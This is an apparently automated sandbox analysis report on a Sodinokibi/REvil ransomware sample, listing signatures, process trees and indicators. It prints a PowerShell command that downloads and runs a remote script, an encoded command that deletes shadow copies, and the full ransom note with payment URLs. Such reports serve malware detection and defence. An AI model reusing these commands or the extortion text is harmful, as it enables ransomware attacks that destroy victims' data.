Analysis

  • max time kernel
    142s
  • resource
    win7v191014
  • submitted
    20-12-2019 06:10

General

  • Target

    e8kSryaf.bat

  • Sample

    191220-matk4mdz1j

  • SHA256

    632b25be71b19500300e6e3e404c0b3c7bc7f8538bc3db94fac827bb91ee848a

Malware Config

Extracted
Language: ps1
Source:
URLs (ps1.dropper): http://185.103.242.78/pastes/e8kSryaf

Extracted
Language: ps1
Source:

Extracted
Path: C:\7khgp2z3-readme.txt
Family: sodinokibi

Ransom Note ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 7khgp2z3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/041FB4C15C08312C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/041FB4C15C08312C Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: jLNvxkiCsDU96tNP+jdSNkcPED/nEUyL1PPEtpHPCVCzZp8bdGwY9sYyvwKMo4Ae QXohQ3f56IhrJQPrT5kI2DymerPLzDJuJJbFarQD1UAwLyUz06zaC1TXKmDkzkWF azfFl9jMVLdAOsoV1pc0J09JEZSMVZWPNJ+4M6+Tj2GsOkDUCVlT/bke3Q1KOp3j UcufmLPsC5psThJmIL/Qqieb3rUocN8p67o+oJqiPNnEeTVttsbHydFGfVe55ZSH BrGHsphpSGWPn5DJUlTBV8O6NlTUdKxq44Kt9Foe3QN/cGUItszetj9Y4AnAvKjW VY4Ixj7abFvWDtUxOLg7EkuZ+u6P6xlFc5LV4brAejj1RO/hBEEKwseh1TCEQvVv /MoYXeRMqD43AuKEqidLUdXS5b1LIQBT2RAApovLZcR0bticKG6ZQqS0/ulLceuc 1ToCS9CuMvJJ68qctgiwPgY0x6uBBB1/NaJu5eJcUUeoghhsRJ6MiFKW1Wih47wV wzlKw8FZnPxkUdvgVlgDNEXFS7j1xsVSsWvkSBipg5uUYI+fBuAN2eBfXj1KMy6U 0fnth5U5Ef6IHNxivXuc+DTa0gnGrhQ8B+vEUeY9zGVWJiiCk5LeEjMLoGSnUPuv +DY6+I6D9vgTaghR8zoIckMH5JNGkliM9VImOrlNBLkSiqXf+d6z6wQxdBT8p0a7 mxqGS71o2x1fTOHYiXFJnkk3rTYafWLVQFtBgrL2/Mczv2/GB/YH4teWPc5a+aK0 Q738Khb8yWb9kH4Mq1Pq70oTFzEE/oh31Jn7RecfjEzCGVkOOtY+DEe3crwZnOM5 5JzpGA/F+aFZAEVejr7dPpXGkdt6MeCnGR12CGa9Iw8U+65RCLKFamk4tHeuQn8X HLFLdN9LVOnMVRd+aqd9ogvmQikPSwyDmzGb234dd23xt3VN/l/nQf46o0RW0vKC 4w9l77cka8XvPAV3V1rx34FV5MUgvlid9Rzg23tgOqzMo085xK/61qKsEfQZeJjY jg/BFymgyOb3NEUC0s9wCGGmvieFN8NIbA2b0a4eHR+HvQeqqsh20odhfSy9G5v2 CdBQHkHnq327+z5+8RwH5yhGQ7otOPZmxYAO5RrfRom/G/PQPE83uFI33S4xHyFG mXGig0w7sn4emRpEICjBuA== Extension name: 7khgp2z3 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/041FB4C15C08312C
http://decryptor.top/041FB4C15C08312C

Signatures

  • Sets desktop wallpaper using registry ⋅ 2 TTPs 1 IoCs
  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Suspicious use of WriteProcessMemory ⋅ 2 IoCs
  • Drops file in Program Files directory ⋅ 33 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 2 IoCs
  • Discovering connected drives ⋅ 3 TTPs 7 IoCs
  • Modifies system certificate store ⋅ 2 TTPs 6 IoCs
  • Drops file in System32 directory ⋅ 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\e8kSryaf.bat"
    Suspicious use of WriteProcessMemory
    Discovering connected drives
    PID:2044
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/e8kSryaf');Invoke-FRJQQICACGLPV;Start-Sleep -s 10000"
      Suspicious use of WriteProcessMemory
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Discovering connected drives
      Drops file in System32 directory
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:1436
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} — deletion of Volume Shadow Copies, which is why vssvc.exe starts below)
        Suspicious behavior: EnumeratesProcesses
        Discovering connected drives
        Suspicious use of AdjustPrivilegeToken
        PID:1016
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    Suspicious use of AdjustPrivilegeToken
    PID:1884

Network

MITRE ATT&CK Matrix

Tactic columns: Collection, Command and Control, Credential Access, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms